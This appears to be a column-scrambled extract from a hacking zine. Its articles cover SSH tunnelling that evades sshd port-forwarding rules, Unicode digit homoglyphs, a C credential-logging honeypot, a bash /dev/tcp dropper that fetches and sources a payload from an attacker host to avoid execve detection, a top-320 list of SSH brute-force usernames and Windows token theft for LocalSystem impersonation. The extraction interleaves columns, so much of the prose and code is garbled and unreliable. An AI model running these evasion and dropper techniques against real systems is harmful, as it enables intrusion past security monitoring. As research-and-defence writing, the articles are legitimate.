After completing authentication, ssh(1) proceeds with arrive at the local listener, new yamux channels are
opening ’channels’ to the requested SSH subsystems on opened over the same command IO channel:
the remote server. A channel in this context is a % yamuxfwd -l 8080 -- ssh server -- yamuxfwd -c localh
bidirectional stream. Under the hood, ssh(1) ost :8080 &
multiplexes multiple channels over the same, single
TCP connection that was established during the
authentication phase.
Channels have an associated type, which indicates to
the server what destination subsystem should consume
the channel traffic. Command execution, X11 forwards,
Throwing an HTTP proxy server into the mix (here I
and port forwards all have associated channel types.
used ncat(1)), we are able to construct a command
sshd config port forwarding enforcement only
pipeline that eventually interfaces the remote ncat
runs for channels of the port-forward type.
proxy server as a port listening on the client’s
Finding a Workaround localhost, usable by a local browser: (works like ssh -D)
% ssh server -- ncat - klp 1342 -- proxy - type http &
Let’s analyze what happens when we execute a single % yamuxfwd -l 1342 -- ssh server -- yamuxfwd -c localh
ost :1342 &
remote command: echo foo | ssh myserver -- cat
% echo foo | ssh server -- cat
foo

And there you have it: a functional HTTP proxy over


SSH’s command channel, that runs without triggering
It appears to be possible for two remote programs to sshd’s port-forwarding enforcement.
interact with each other via standard streams, piped Alternatively
through SSH. Assuming we are able to upload new
programs to the server, we can probably tunnel any For SSH, you could get away with creating the sneaky
type of conversation we want between the two remote tunnel without using yamux at all. All you need to do
programs. What about tunneling a second multiplexer? is to reuse the already-existing SSH channel
multiplexer. Instead of establishing a yamux convo
yamuxfwd over a single command channel, use the SSH control
socket feature to create new command channels as
Yamux is a simple multiplexing protocol, that like needed, cheaply. Here are the commands:
SSH’s channels multiplexer, is able to transfer multiple
% ssh -M -S / tmp / ssh -% r@ % h :% p - fN server &
bidirectional streams over a single IO channel. Unlike % ssh -S / tmp / ssh -% r@ % h :% p server -- ncat -l 127.0.0.1
SSH, yamux can be packaged as a standalone program, -p 1342 -- proxy - type http &
% ncat - klp 1342 -c ’ ssh -S / tmp / ssh -% r@ % h :% p server -
which allows using it in versatile situations, say - ncat 127.0.0.1 1342 ’ &
through an SSH command channel... % curl -x http : // l o c a l h o s t :1342 https :// web - service

Guy Sviry
github: https://github.com/guysv
SAA-TIP 0.0.7 53
May
Join Us for the 7th
26-
Edition of TyphoonCon! 30
Want to have your Don’t miss your chance [Location]
[training] considered to headline our 2-day Le Meridien Seoul
for TyphoonCon 2025? [conference] and enjoy Myeongdong

our exceptional perks!


typhooncon.com

2025 CFT is Now Open: Submit Your Talk at:


Powered by
https://typhooncon.com/ https://typhooncon.com/
call-for-training-2025/ call-for-papers-2025/
Digits of Unicode Security/Hacking

When thinking about


string-to-integer conversion,
we (especially in the
"western" world) usually think
only about "ASCII" digits – you
know, the normal ones, in the
0 1 2 3 4 5 6 7 8 9
range of 0x30 to 0x39. 0 1 2 3 4 5 6 7 8 9
𝟎 𝟏 𝟐 𝟑 𝟒 𝟓 𝟔 𝟕 𝟖 𝟗
However, ASCII is a thing of

𝟶 𝟷 𝟸 𝟹 𝟺 𝟻 𝟼 𝟽 𝟾 𝟿
the past – Unicode
(thankfully) is widely

𝟘 𝟙 𝟚 𝟛 𝟜 𝟝 𝟞 𝟟 𝟠 𝟡
supported, and its support
has also reached the
aforementioned str-to-int
𝟢 𝟣 𝟤 𝟥 𝟦 𝟧 𝟨 𝟩 𝟪 𝟫
𝟬 𝟭 𝟮 𝟯 𝟰 𝟱 𝟲 𝟳 𝟴 𝟵
conversion.

What's important to know is


that Unicode actually defines ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀
A LOT of different groups of ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀
႐ ႑ ႒ ႓ ႔ ႕ ႖ ႗ ႘ ႙
digits, and that number
keeps growing (in the last 13
years around 26 groups have
been added; i.e. from 42
groups in 2011 we arrived at
฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀
68 groups in 2024). ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀ ฀
Furthermore, some standard Note: Everything above is the same font, just different
str-to-int functions in certain Unicode characters.
programming languages
actually support more digit
groups than just the classic
ASCII ones.

For example:
Homoglyph attack example
(i.e. what happens if you display what you received
before doing the conversion).
● Python's int() supports
68 different digit groups. { "offer_value": "\u0b68\u0b68\u0b68" }
● Java's
Integer.parseInt()
supports 38 different digit
groups.
● On the flip side e.g.
JavaScript supports only Buyer's offer: ୨୨୨ USD
the standard "ASCII"
group. Might be different
for e.g. Node.js though.
Accept Reject
In general, support varies
between both languages (i.e.
their standard libraries),
frameworks, other libraries, int("୨୨୨") » 222
and so on.

Furthermore, since some


digits in certain groups look
somewhat similar to other Further reading
digits in other groups
(especially in the "ASCII" https://www.fileformat.info/info/unicode/category/Nd/list.htm
group), one has to be aware https://gynvael.coldwind.pl/?id=419
of the homoglyph attack (see https://en.wikipedia.org/wiki/Numerals_in_Unicode
https://www.unicode.org/versions/Unicode16.0.0/core-spec/chapter-
example on the right).
4/#G124206

Gynvael Coldwind
https://hexarcana.ch/
SAA-ALL 0.0.7 https://gynvael.coldwind.pl/ 55
Security/Hacking EasyHoneypot

EasyHoneypot
Santiago Garcia-Jimenez
if(read(clientSocket,&data,99) < 1){continue;};
data[99]=’\0’;sscanf(data,"%s",user);
write(clientSocket,"password: ",10);
https://github.com/4nimanegra/EasyHoneyPot memset(data,0,100*sizeof(char));
if(read(clientSocket,&data,99) < 1){continue;};data[99]=’\0’;
sscanf(data,"%s",pass);close(clientSocket);
The code implements a simple user and password- printf("%d:%s:TELNET:%s:%s\n",mytime.tv_sec,
logging honeypot, designed to detect lateral movements inet_ntoa(ipclient.sin_addr),user,pass);
fflush(stdout);clientSocket=0;}}
in cyberattacks. It handles authentication for FTP, int smtpHoney(){
SSH, Telnet, and SMTP services, displaying credentials, int smtpSocket, clientLen=0, clientSocket;struct sockaddr_in ip;
struct sockaddr_in ipclient;char data[100];
timestamps, and IP addresses on the screen. memset(data,0,100*sizeof(char));char user[100];
#include <libssh/libssh.h> memset(user,0,100*sizeof(char));char pass[100];
#include <libssh/server.h> memset(pass,0,100*sizeof(char));char *b64user,*b64pass;
#include <stdlib.h> struct timeval mytime;bzero((char *) &ip, sizeof(ip));
#include <string.h> ip.sin_family = AF_INET;ip.sin_addr.s_addr = htonl(INADDR_ANY);
#include <stdio.h> ip.sin_port = htons(2500);clientLen=sizeof(ipclient);
#include <sys/time.h> smtpSocket = socket(AF_INET,SOCK_STREAM,0);
#include <unistd.h> if(bind(smtpSocket, &ip , sizeof(ip))<0){return -1;}
#include <sys/types.h> listen(smtpSocket , 20);clientSocket=0;
#include <sys/socket.h> while(1 == 1){if(clientSocket != 0){close(clientSocket);}
#include <netinet/in.h> clientSocket = accept(smtpSocket,&ipclient,&clientLen);
#include <arpa/inet.h> gettimeofday(&mytime, NULL);write(clientSocket,
#include <pthread.h> "220 smtp.ezequiel.ca ESMTP server\r\n",35);
#include <openssl/pem.h> memset(data,0,100*sizeof(char));
#include <signal.h> if(read(clientSocket,&data,99)<1){continue;}; data[99]=’\0’;
struct sockaddr_in myip; if(strlen(data)>7){sscanf(&data[5],"%s",user);}else{
char *base64decode (const void *b64, int b64lon){ continue;};write(clientSocket,"250-smtp.ezequiel.ca Hello ",
BIO *b64_bio, *mem_bio;int index = 0; 27); write(clientSocket,user,strlen(user));
char *clean = calloc(b64lon,sizeof(char)); write(clientSocket,"\r\n",2);write(clientSocket,
b64_bio = BIO_new(BIO_f_base64()); "250 AUTH LOGIN\r\n",16); memset(data,0,100*sizeof(char));
mem_bio = BIO_new(BIO_s_mem());BIO_write(mem_bio, b64, b64lon); if(read(clientSocket,&data,99)<1){continue;};
BIO_push(b64_bio, mem_bio); sprintf(user,"AUTH"); while(strcmp(user,"AUTH")==0){
BIO_set_flags(b64_bio, BIO_FLAGS_BASE64_NO_NL); write(clientSocket,"334 VXNlcm5hbWU6\r\n",18);
while ( 0 < BIO_read(b64_bio, clean+index, 1) ){index=index+1;} memset(data,0,100*sizeof(char));
BIO_free_all(b64_bio); return clean;} if(read(clientSocket,&data,99)<1){data[0]=’\0’;break;};
static int auth_password(const char *user, const char *password){ data[99]=’\0’;sscanf(data,"%s",user);}
return 0;} if(strlen(data)<1){continue;};
char *getClientIp(ssh_session session) { data[99]=’\0’;sscanf(data,"%s",user);
struct sockaddr_storage tmp; struct sockaddr_in *sock; write(clientSocket,"334 UGFzc3dvcmQ6\r\n",18);
unsigned int len = 100; memset(data,0,100*sizeof(char));
char *ip = (char *)malloc(100*sizeof(char));ip[0]=’\0’; if(read(clientSocket,&data,99)<1){continue;};
getpeername(ssh_get_fd(session), (struct sockaddr*)&tmp, &len); data[99]=’\0’;sscanf(data,"%s",pass);
sock = (struct sockaddr_in *)&tmp; write(clientSocket,"535 Bad password.\r\n",19);
inet_ntop(AF_INET, &sock->sin_addr, ip, len);return ip;} close(clientSocket);
int sshHoney(){ b64user=base64decode(user,strlen(user));
ssh_session session;ssh_bind sshbind;ssh_message message; b64pass=base64decode(pass,strlen(pass));
ssh_channel chan=0; char buf[2048]; int auth=0, sftp=0, i,r; strtok(b64user,"@ezequiel.ca");
struct timeval mytime; printf("%d:%s:SMTP:%s:%s\n",mytime.tv_sec,
while(1==1){ sshbind=ssh_bind_new(); session=ssh_new(); inet_ntoa(ipclient.sin_addr),b64user,b64pass);
ssh_bind_options_set(sshbind, SSH_BIND_OPTIONS_BINDPORT_STR, free(b64user);free(b64pass);fflush(stdout);clientSocket=0;}}
"2200"); int ftpHoney(){
ssh_bind_options_set(sshbind, SSH_BIND_OPTIONS_RSAKEY, int ftpSocket, clientLen=0, clientSocket; struct sockaddr_in ip;
"./ssh_host_rsa_key"); struct sockaddr_in ipclient; char data[100]; char user[100];
gettimeofday(&mytime, NULL); memset(data,0,100*sizeof(char));char pass[100];
if(ssh_bind_listen(sshbind)<0){return -1; memset(user,0,100*sizeof(char));struct timeval mytime;
}else{r=ssh_bind_accept(sshbind,session); memset(pass,0,100*sizeof(char));bzero((char *) &ip, sizeof(ip));
if(r!=SSH_ERROR){if(!ssh_handle_key_exchange(session)) { ip.sin_family = AF_INET; ip.sin_addr.s_addr = htonl(INADDR_ANY);
auth=0; ip.sin_port = htons(2100); clientLen=sizeof(ipclient);
while(!auth){message=ssh_message_get(session); ftpSocket = socket(AF_INET,SOCK_STREAM,0);
if(!message)break; if(bind(ftpSocket, &ip , sizeof(ip))<0){return -1;}
if(ssh_message_type(message)==SSH_REQUEST_AUTH){ listen(ftpSocket , 20);
if(ssh_message_subtype(message)==SSH_AUTH_METHOD_PASSWORD){ while(1 == 1){
printf("%d:%s:SSH:%s:%s\n",mytime.tv_sec, clientSocket = accept(ftpSocket,&ipclient,&clientLen);
getClientIp(session),ssh_message_auth_user(message), gettimeofday(&mytime, NULL);write(clientSocket,"220 \r\n",6);
ssh_message_auth_password(message));fflush(stdout); memset(data,0,100*sizeof(char));
ssh_message_auth_set_methods(message, if(read(clientSocket,&data,99) < 6){continue;};
SSH_AUTH_METHOD_PASSWORD);}} data[99]=’\0’;user[0]=’\0’;sscanf(data,"USER %s",user);
ssh_message_reply_default(message);ssh_message_free(message); write(clientSocket,"331 \r\n",6);
}}}}ssh_disconnect(session);ssh_bind_free(sshbind); memset(data,0,100*sizeof(char));
ssh_finalize();}return 0;} if(read(clientSocket,&data,99) < 6){continue;};
int telnetHoney(){ data[99]=’\0’;pass[0]=’\0’;sscanf(data,"PASS %s",pass);
int telnetSocket,clientLen=0, clientSocket; write(clientSocket,"530 User cannot log in.\r\n",25);
struct sockaddr_in ip;struct sockaddr_in ipclient; close(clientSocket); printf("%d:%s:FTP:%s:%s\n",
char data[100];memset(data,0,100*sizeof(char));char user[100]; mytime.tv_sec,inet_ntoa(ipclient.sin_addr),user,pass);
memset(user,0,100*sizeof(char));char pass[100]; fflush(stdout);clientSocket=0;}}
memset(pass,0,100*sizeof(char));struct timeval mytime; int main(int argc, char **argv){
bzero((char *) &ip, sizeof(ip)); signal(SIGPIPE,SIG_IGN);
ip.sin_family = AF_INET;ip.sin_addr.s_addr = htonl(INADDR_ANY); pthread_t sshThread,ftpThread,telnetThread,smtpThread;
ip.sin_port = htons(2300);clientLen=sizeof(ipclient); pthread_create(&sshThread, NULL,&sshHoney, NULL);
telnetSocket = socket(AF_INET,SOCK_STREAM,0); pthread_create(&ftpThread, NULL,&ftpHoney, NULL);
if(bind(telnetSocket, &ip , sizeof(ip))<0){return -1;} pthread_create(&telnetThread, NULL,&telnetHoney, NULL);
listen(telnetSocket , 20);clientSocket=0; pthread_create(&smtpThread, NULL,&smtpHoney, NULL);
while(1 == 1){if(clientSocket != 0){close(clientSocket);} while(1==1){sleep(60);}}
clientSocket = accept(telnetSocket,&ipclient,&clientLen);
gettimeofday(&mytime, NULL);write(clientSocket,"user: ",6); This work was originally created for PagedOut and translated by the author for UnderD0cs Magazine 12.
memset(data,0,100*sizeof(char)); https://underc0de.org/foro/e-zines/underdocs-julio-2020-numero-12/ (It requires free registration).

Garcia-Jimenez, Santiago
https://github.com/4nimanegra
56 CC BY 4.0
Execve(2)-less dropper to annoy security engineers Security/Hacking

Execve(2)-less dropper to annoy security engineers


I. Introduction fi
for file in "$@"; do
Many antivirus software and HIDS tools base some (or most) if [ ! -r "$file" ]; then
of their detection methods on kernel probes or modules that aim echo "Cannot read file: $file" >&2
continue
to detect the invocation of malicious binaries that could lead

to privilege escalation, persistence, or pivoting. In the almighty while IFS= read -r line; do
Cloud era, we can, for example, think of Falco and its well- echo "$line"
known evt.type = execve that is probably deployed in every done < "$file"
Kubernetes cluster using it as a default rule¹. However, this done
}
small paper will show how, thanks to the hackers’ best friend # avoid being betrayed by memory muscle :0)
Bash, pentesters and red-teamers can easily bypass such detec- alias cat="z_cat"
tion mechanisms to further compromise the target.
B. The gun
Once this script is live somewhere on a webserver accessible
II. One shell to rule them all
from the compromised machine, we can download it using this
Bash (and many other shells) have a capability that may look one-liner dropper that will drop what’s stored on $FPATH onto
inoffensive at first: built-ins. As their name states, they are com- the compromise machine :
mands that are directly built in the Bash program, meaning they exec 3<>/dev/tcp/${IP?}/${PORT?}; printf
do not rely on other programs to execute instructions. If you "GET /${FPATH?} HTTP/1.1\r\nHost:
ever opened a terminal running Bash, you already met them: localhost\r\nConnection: close\r\n\r\n">&3;
cd, echo, alias and co.² f=0; while IFS= read -r l<&3; do [ $f -eq 1 ]
&& echo "$l"; [[ $l == "#_"* ]] && f=1; done >
By being implemented directly in the bash binary, launch-
dropped; exec 3<&-
ing those commands will be invisible if you’re looking for new
processes being spawned because they are just part of the initial Now you can source the file named dropped and you have your
Bash runtime. If smartly coupled with other shell mechanisms additional Bash functions loaded!
such as redirections, it is possible for someone having a foothold bash:~$ . dropped
to get new files on the system and expend their capabilities. bash:~$ z_cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
III. The attack
You can verify that no calls to execve(2) are done using
A. The bullet strace:
Before building our devilish one-liner dropper, we first need # strace -p "${SHELL_PID}" -e trace=execve
something to drop on the machine. As source, which allows
us to run shell commands from a file, is a Bash built-in (hence IV. Going further
invisible when looking for malicious spawned processes), we
can imagine dropping and running a Bash library adding new Now that we can easily bypass HIDS looking for new
functions exclusively written with built-ins, like a cat alterna- spawned processes, we can explore novel ways to expend our
tive in pure Bash. Let’s create it: capabilities and, in the end, gain full control of the machine.
One way I’ve been thinking of but never implemented is to find
#_
#!/bin/bash a way to patch Bash’s shared library, so that we can add new
built-ins that cannot be mimicked without using binaries (rm is
function z_cat() { a good example).
if [ "$#" -eq 0 ]; then On the blue-team side, this technique may be detected by
echo "Usage: $0 <file> [file ...]" >&2
logging every call to read(2) made by interactive processes
return
(think shells), hence making a full keylogger. However, this will
¹https://github.com/falcosecurity/rules/blob/b6ad37371923b28d4db probably generate a lot of logs, depending on your infrastruc-
399cf11bd4817f923c286/rules/falco_rules.yaml#L81-L82 ture.
²You can get the full list by running man bash and looking for the
‘shell builtins command’ chapter.

Hugo Blanc
Blog: https://syscall.cafe/
CC BY-SA 4.0 X/Twitter: @_angry_penguin 57
Security/Hacking Hackers' Favorite SSH Usernames: A Top 320 Ranking

Hackers' Favorite SSH Usernames: A Top 320 Ranking


Source: my personal honeypot. Observation period: 22.09.24–09.10.24. Numbers in parentheses denote number of detected samples.
1. ubuntu (2429) 65. koha (102) 129. oscar (27) 193. john (17) 257. tester (14)
2. admin (1837) 66. baikal (101) 130. info (26) 194. postgre (17) 258. 12345 (13)
3. test (1827) 67. ionguest (101) 131. prueba (26) 195. vic (17) 259. b (13)
4. user (1511) 68. payara (99) 132. telecomadmin (26) 196. actordb (16) 260. blank (13)
5. postgres (904) 69. Antminer (97) 133. jack (25) 197. bigdata (16) 261. dell (13)
6. steam (791) 70. pi (80) 134. deployer (24) 198. confluence2 (16) 262. rabbitmq (13)
7. sysadmin (698) 71. ftp (78) 135. palworld (24) 199. dmdba (16) 263. rsync (13)
8. deploy (657) 72. centos (73) 136. plex (24) 200. eluser (16) 264. spark (13)
9. testuser (646) 73. www (73) 137. daemon (23) 201. esearch (16) 265. terraria (13)
10. odoo (630) 74. udatabase (61) 138. games (23) 202. fileftp (16) 266. testing (13)
11. support (570) 75. uucp (56) 139. alex (23) 203. gj5 (16) 267. vpn (13)
12. oracle (536) 76. app (56) 140. butter (23) 204. hysteria (16) 268. xguest (13)
13. ftpuser (436) 77. tom (56) 141. default (23) 205. jfedu1 (16) 269. admin2 (12)
14. debian (414) 78. operator (54) 142. gitlab-psql (23) 206. kuma (16) 270. ansadmin (12)
15. root (385) 79. dolphinscheduler (53) 143. inspur (23) 207. latitude (16) 271. appuser (12)
16. dev (382) 80. test1 (53) 144. mongodb (23) 208. lupeng (16) 272. contador (12)
17. server (366) 81. solana (52) 145. niaoyun (23) 209. modserver (16) 273. grafana (12)
18. guest (283) 82. sonar (48) 146. wordpress (23) 210. moodle (16) 274. james (12)
19. tomcat (276) 83. zabbix (48) 147. 1234 (22) 211. nifi (16) 275. jumpserver (12)
20. username (275) 84. adminadmin (46) 148. bot (22) 212. noama (16) 276. mark (12)
21. usuario (274) 85. docker (46) 149. elsearch (22) 213. ntps (16) 277. mc (12)
22. jenkins (262) 86. esuser (46) 150. lenovo (22) 214. observer (16) 278. rust (12)
23. nexus (261) 87. redis (46) 151. openproject (22) 215. odoo16 (16) 279. sambauser (12)
24. administrator (252) 88. test2 (46) 152. rancher (22) 216. odoo17 (16) 280. service (12)
25. thomas (251) 89. gitlab (45) 153. ts (22) 217. owncast (16) 281. adm (11)
26. test_user (247) 90. demo (44) 154. worker (22) 218. raj_ops (16) 282. Admin (11)
27. svn (246) 91. vagrant (43) 155. amandabackup (21) 219. registery (16) 283. appltest (11)
28. test01 (246) 92. elasticsearch (42) 156. gitlab-runner (21) 220. roamware (16) 284. awsgui (11)
29. tuan (245) 93. samba (42) 157. lsfadmin (21) 221. ruijie (16) 285. esroot (11)
30. sopuser (244) 94. ec2-user (41) 158. proxy (20) 222. runner (16) 286. flussonic (11)
31. tg (244) 95. uftp (41) 159. dspace (20) 223. shyunchen123 (16) 287. gpuadmin (11)
32. acer (240) 96. ansible (40) 160. openvpn (20) 224. stream (16) 288. hive (11)
33. hadoop (240) 97. sol (40) 161. ramesh (20) 225. svnuser (16) 289. kubernetes (11)
34. sammy (239) 98. nginx (39) 162. webapp (20) 226. trinity (16) 290. linux (11)
35. abhishek (238) 99. wang (39) 163. yarn (20) 227. uniadmin (16) 291. rico (11)
36. superman (236) 100. bin (38) 164. config (19) 228. usr1cv8 (16) 292. RPM (11)
37. david (228) 101. nobody (37) 165. factorio (19) 229. woojin (16) 293. sinusbot (11)
38. mysql (227) 102. elastic (37) 166. hp (19) 230. wso2 (16) 294. sshadmin (11)
39. git (224) 103. teste (37) 167. kingbase (19) 231. yealink (16) 295. vyatta (11)
40. iptv (207) 104. ubuntuserver (37) 168. martin (19) 232. zhongren1 (16) 296. airflow (10)
41. es (199) 105. node (35) 169. media (19) 233. ali (15) 297. albert (10)
42. newuser (181) 106. gpadmin (34) 170. mehdi (19) 234. amp (15) 298. ark (10)
43. frappe (166) 107. huawei (34) 171. share (19) 235. arkserver (15) 299. bruno (10)
44. chris (150) 108. jito (34) 172. sk (19) 236. clemens (15) 300. cisco (10)
45. minecraft (145) 109. lighthouse (34) 173. ts3 (19) 237. ftp_client (15) 301. fivem (10)
46. debianuser (132) 110. nagios (34) 174. web (19) 238. manager (15) 302. ftptest (10)
47. kafka (122) 111. apache (32) 175. webdev (19) 239. mssql (15) 303. grid (10)
48. daniel (121) 112. opc (32) 176. lp (18) 240. omkar (15) 304. grohr (10)
49. user1 (119) 113. developer (31) 177. abc (18) 241. omsagent (15) 305. image (10)
50. bkp (118) 114. flask (31) 178. dolphin (18) 242. public (15) 306. install (10)
51. adminftp (114) 115. solr (31) 179. drupal (18) 243. sadmin (15) 307. jeff (10)
52. cacti (111) 116. weblogic (31) 180. ds (18) 244. satisfactory (15) 308. jito-validator (10)
53. anand (109) 117. backup (30) 181. flink (18) 245. tools (15) 309. kali (10)
54. nisec (108) 118. sshd (30) 182. g (18) 246. vps (15) 310. NL5xUDpV2xRa (10)
55. radix (108) 119. master (30) 183. netdata (18) 247. webmaster (15) 311. nova (10)
56. elemental (107) 120. user2 (30) 184. puppet (18) 248. zhongren123 (15) 312. pal (10)
57. nextcloud (106) 121. www-data (29) 185. root123 (18) 249. sys (14) 313. puser (10)
58. reza (106) 122. nvidia (29) 186. sftp (18) 250. data (14) 314. scanner (10)
59. basesystem (105) 123. student (29) 187. vbox (18) 251. elk (14) 315. student3 (10)
60. mosquitto (105) 124. news (28) 188. vmail (18) 252. esadmin (14) 316. t (10)
61. smart (104) 125. anonymous (28) 189. mail (17) 253. mapr (14) 317. teamspeak (10)
62. ubnt (104) 126. ranger (28) 190. a (17) 254. monitor (14) 318. tempuser (10)
63. portal (103) 127. system (28) 191. caddy (17) 255. security (14) 319. x (10)
64. ionadmin (102) 128. dbuser (27) 192. infra (17) 256. temp (14) 320. zookeeper (10)

Szymon Morawski
https://szymor.github.io/
58 CC0
Wizard's Inventory Art

angrysnail Instagram: @angrysnail


Twitter/X: @angry__snail
SAA-ALL 0.0.7 Reddit: u/angry_snail 59
Security/Hacking How to generate a Linux static build of a binary

How to generate a Linux static build of a binary


When you need something on Linux, which is often proprietary, it is a binary that includes all the dependencies, as every
Linux distribution is different, varying even between versions!

There are 2+1 ways to create a Linux binary that work almost everywhere:
 A self-contained binary with all the dependencies built in; usually SaaS clients or enterprise tools do that, as does
a bash script with binary stuff
 A binary that will look in your machine for the dependencies, like usually the packages provided with Linux
distributions
 Package the binary using the dependencies from the machine is running and redistributing it, like PyInstaller
does for python projects
It is clear that the binary generated will work only on the same architecture, so amd64 on amd64, arm64 on amr64 and so
on.
Compared to appimage/flatpack/snap, this solution doesn’t use a container with all the benefits and issues they have.

The story
I discovered this topic when I was contributing to github.com/sonic2kk/steamtinkerlaunch/ open source project that
needed a github.com/pvonmoradi/yad/ binary updated (GTK tool to create UIs for CLI scripts). At the end of my
experimentation, the project decided to update it but still keep the AppImage package instead of my pure Linux version
(which I prefer as an approach, honestly).
What I got was github.com/Mte90/yad-static-build/releases/ with a CI that automatically compiles Yad and generates this
static build so it doesn’t need any human interaction (like the project I was contributing to).
They don't trust this kind of build to be a tool that can run from a Steam Deck to a complete distribution but I tested the
outcome on Archlinux, Ubuntu and Debian with the same binary with no issues (also in a KDE environment).

How works
LD_LIBRARY_PATH is a predefined environment variable on Unix/Linux, it is very helpful and used a lot for Linux hacks.
The purpose of this variable is to change on runtime the dynamic/shared libraries (separated by a comma) loaded from
the linker with specific ones instead of the system avalaible. This is very powerful because in a Open Source example, we
can download a library, patch and use it for a specific program, in our case, we will use it for something different instead.
An example to run in your shell $ LD_LIBRARY_PATH="/opt/my_program/lib.so" /opt/my_program/start, as
you can see you can do easily a Bash script with this content.

With ldd, it is possible to list all the libraries needed by the program we want and investigate them, there is usually a lot
of them, and it can get boring to manually gather them all using UI tools. An example:
$ ldd /usr/bin/echo
linux-vdso.so.1 (0x00007f57cf2f8000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f57cf0c6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f57cf2fa000)

The tool
So, we have right now a way to gather a list of libraries, a way to inject them in the process but it can be handy to have a
binary that autoextract itself with all this stuff.
With this askubuntu.com/questions/537479/is-there-any-open-source-way-to-make-a-static-from-a-
dynamic-executable-with-no discussion, I discovered a handy tool (that I expanded but the original developer
implemented my changes after my Pull Request in a different way) that is github.com/oufm/packelf.
The fact that this tool is in Bash and generates a Bash auto extracting script allows also for modifying it easily with no
bundling tools for any needs including understanding how it works.
This tool generated a targizzed bash script with all the libraries (and the binary) from the machine you are running, the
libraries are extracted on runtime on /tmp/ in a folder and deleted when the process is closed (this behavior can be
disabled).

The Yad example


The package generated by the GitHub CI for Yad without HTML support was 13mb compressed and 200mb extracted.
The packaged version with HTML support is 70mb, you can imagine the size decompressed as it includes WebKit stuff.

Previously published on personal blog https://daniele.tech/2024/03/how-to-generate-a-linux-static-build-of-a-binary/

Daniele "Mte90" Scasciafratte


Blog: https://daniele.tech
60 X/Twitter: @mte90net Public Domain
Hack first
and make the world
a safer place!

We've empowered industry leaders


like Coca-Cola, VMware, Intel, and Microsoft
to proactively identify and address vulnerabilities
before cybercriminals exploit them.

With over 100,000 researchers, we detect vulnerabilities


as soon as they surface, ensuring reliability through
meticulous triaging and a community-first mindset.

Sign up today here: https://intigriti.com/

intigriti.com
Art lightstation

Yoga Réformanto (foxtronaut)


https://instagram.com/foxtronauts
62 https://foxtronaut.artstation.com Custom / Negotiated Individually
Playing with tokens Security/Hacking

Playing with Windows Security Tokens


According to Microsoft’s definition, Security Token is an object that describes
the security context of a process or thread. When a user logs on, Winlogon
asks LSASS for a token and then launches the userinit.exe process, which in
turn runs the Explorer and dies. Most things the user sees are descendants of
the Explorer (however, some exceptions can happen e.g. when the user presses
Ctrl+Shift+Esc). The simplest case happens when the process launches (spawns)
a new one without specifying any special wishes related to the new process’s
identity. The token of the parent is inherited by the child and tokens are
identical. It’s the reason why whoami.exe can analyze and display its own
token, and the information you see tells you the truth about the parent’s token
as well.
When you want to launch a process with a different security context, you need
a token. There are two easy ways to get one:
- Grab username and password and call CreateProcessWithLogon(). Windows does
everything for you. The funny part is the third parameter containing the
cleartext password. If you intercept the call (using debugger trap, hooking,
Detour, Rohitab API Monitor or whatever else) and if you know x64 calling
convention, you can read R8 CPU Register and find the password in the referenced
memory.
- Grab the ready to use token and call CreateProcessAsUser(). You can obtain
the token from LogonUser() or duplicate (a.k.a. steal) the token of another
process with DuplicateTokenEx(). Effectively, if you can open another process,
you can act using its security context. In practice, it’s one of the easiest
methods of impersonating a LocalSystem. Duplicating token of the Winlogon.exe
does the job quickly and efficiently.
There is an less than easy way as well: if you are privileged to "Act as a
part of the operating system" via SeTcbPrivilege, you can ask LSASS for a
custom-made token following literally any criteria. Want to be
TrustedInstaller? Just ask. Use fake domain or non-existing user? No problem!
The flow is:
1. Add SID mapping via LsaManageSidNameMapping() for the fake domain.
2. Add SID mapping (same way) for the fake user.
3. Ask for a token using SIDs prepared by calling LogonUserExExW().
4. Duplicate the token obtained to make it useful for impersonating.
5. Call CreateProcessAsUser().
If you want to dig into token internals, the WinDbg seems to be the best option.
You can use the following commands:
- "dt nt!_token" - displays token structure taken from Symbols.
- "!token" - displays the current token in a friendly way
- "!process 0nXXXX 1" - displays process (PID=XXXX) data including ready-to-
click token address in the memory.

Grzegorz Tworek
https://x.com/0gtweet
SAA-TIP 0.0.7 https://github.com/gtworek/PSBits 63
Security/Hacking Using PNG as a way to share files

Using PNG as a way to share 1. from PIL import Image

files with your friends. 2. from PIL.PngImagePlugin import PngInfo


3. from math import sqrt, ceil
Discover if it is possible to store and share files as a PNG 4. def get_byte_list(path: str) -> list:
image with various platforms. 5. file = open(path, 'rb').read()
6. return [b for b in file]
7. def save_image(path: str):
How does it work? 8. metadata = {}
PNG has a few color types. The most interesting for us and also 9. raw_data = open(path, 'rb').read()
easy to implement is “greyscale” where each pixel is exactly one 10. metadata['length'] = raw_data_length =
byte (value from 0 to 255) len(raw_data)
Each file is made out of bytes, so we can simply loop over the 11. width = height = ceil(sqrt(raw_data_length))
bytes representation of the file, and store the next bytes as the 12. while (width * height) + 1 != raw_data_length:
next pixels in an image. 13. raw_data += b'\x00'
14. raw_data_length += 1
15. image = Image.frombuffer('L', (width,
Implementation height), raw_data)
Saving as PNG 16. info = PngInfo()
17. for key, value in metadata.items():
Python PIL has Image.frombuffer() function to make an image 18. info.add_text(key, value)
from clear bytes. But we have one problem - the size of the file 19. image.save('output.png', pnginfo=info)
can be different than the possible image resolution. Solution to 20. def read_image(path: str) -> (list, dict):
this is to put extra \x00 at the end of a file and save the original 21. image = Image.open(path)
length of a file to EXIF of the model so that it’ll be possible to 22. width, height = image.size
read the exact file model in the future. 23. pixels = [image.getpixel((x, y)) for
y in range(height) for x in range(
Reading from PNG width)]
24. return (pixels, image.info)
With greyscale it’s simple. We need to loop for each pixel and
25. def save_file(path: str, name: str) -> None:
save its value to a list, read from EXIF about the length of a
26. image, metadata = read_image(path)
file and then save the segment where our file is stored.
27. length = int(metadata['length'])
